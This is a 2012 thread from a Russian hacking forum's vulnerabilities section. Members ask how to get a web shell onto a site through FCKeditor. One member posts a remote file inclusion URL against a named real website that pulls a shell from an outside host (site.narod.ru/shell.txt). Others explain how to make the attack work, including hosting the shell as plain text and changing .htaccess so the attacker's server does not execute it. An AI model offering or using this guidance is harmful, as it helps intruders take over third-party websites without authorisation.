HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.10.2012, 15:14
Vip77
Участник форума
Регистрация: 29.09.2012
Сообщений: 233
С нами: 7167926

Репутация: 20
По умолчанию

раскрытие путей=)
 
Ответить с цитированием

  #2  
Старый 26.10.2012, 18:13
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
С нами: 9979143

Репутация: -5
По умолчанию

Собственно возникло 2 вопроса:

1) Имеется FCKeditor version 2.6.4.1 Build 23187, есть варианты залить shell?

2) Есть форма для загрузки картинок php спокойно грузит, но вот проблема в том что при просмотре выдает:

[CODE]
яШяаJFIFяю>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality яЫC    $.' ",#(7),01444'9=82
 
Ответить с цитированием

  #3  
Старый 26.10.2012, 18:18
DyukiN
Участник форума
Регистрация: 10.07.2011
Сообщений: 252
С нами: 7811606

Репутация: 21
По умолчанию

_ttp:/thread314734.html
 
Ответить с цитированием

  #4  
Старый 27.10.2012, 07:03
Faaax
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами: 8263766

Репутация: 11
По умолчанию

Ребят подскажите в чём проблемма?

Имеется RFI

Код:
http://www.basegroup.su/index.php?Page=
но когда подставляю ссыль на свой шелл,то всё выводит,но выполняет на моём серваке,а не на сайте.

Подскажите как решить проблемму?
 
Ответить с цитированием

  #5  
Старый 27.10.2012, 07:11
WendM
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами: 7519286

Репутация: 3
По умолчанию

Цитата:
Сообщение от Faaax  
Ребят подскажите в чём проблемма?
Имеется RFI
Код:
http://www.basegroup.su/index.php?Page=
но когда подставляю ссыль на свой шелл,то всё выводит,но выполняет на моём серваке,а не на сайте.
Подскажите как решить проблемму?
1) Твой сервер не должен поддерживать php (narod.ya.ru идеален)

2) Шелл должен быть вида shell.txt

Удачи

P.S У меня все работает))!
 
Ответить с цитированием

  #6  
Старый 27.10.2012, 07:19
Faaax
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами: 8263766

Репутация: 11
По умолчанию

мля запарил,что серв не должен поддерживать php(

да это знаю,просто запарил
 
Ответить с цитированием

  #7  
Старый 27.10.2012, 07:34
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от WendM  
1) Твой сервер не должен поддерживать php (narod.ya.ru идеален)
Не совсем так. Правильнее будет сказать, что сервер должен отдавать php в формате plain-text. А использовать narod.ru или положить в корень своего сайта .htaccess - ваше дело.

По сути подойдёт любой сторонний шелл и пара строчек в корне папки.

Совсем не обязательно иметь дело с narod.ru

Цитата:
Сообщение от WendM  
2) Шелл должен быть вида shell.txt
Опять ошибочное суждение. Не важно расширение файла, так как при инклуде любой файл интерпретируется как PHP.

Важно, лишь чтобы файл не интерпретировался на дочернем сайте. Но об этом я писал выше.
 
Ответить с цитированием

  #8  
Старый 27.10.2012, 07:43
Faaax
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами: 8263766

Репутация: 11
По умолчанию

хм всё равно не хочет
 
Ответить с цитированием

  #9  
Старый 27.10.2012, 09:09
WendM
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами: 7519286

Репутация: 3
По умолчанию

Цитата:
Сообщение от Faaax  
хм всё равно не хочет
ну у меня то работает
 
Ответить с цитированием

  #10  
Старый 27.10.2012, 09:18
Faaax
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами: 8263766

Репутация: 11
По умолчанию

не знаю чё такое у меня

ставлю http://www.basegroup.su/index.php?Page=site.narod.ru/shell.txt

просто пустая страница,а в исходнике код и всё
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.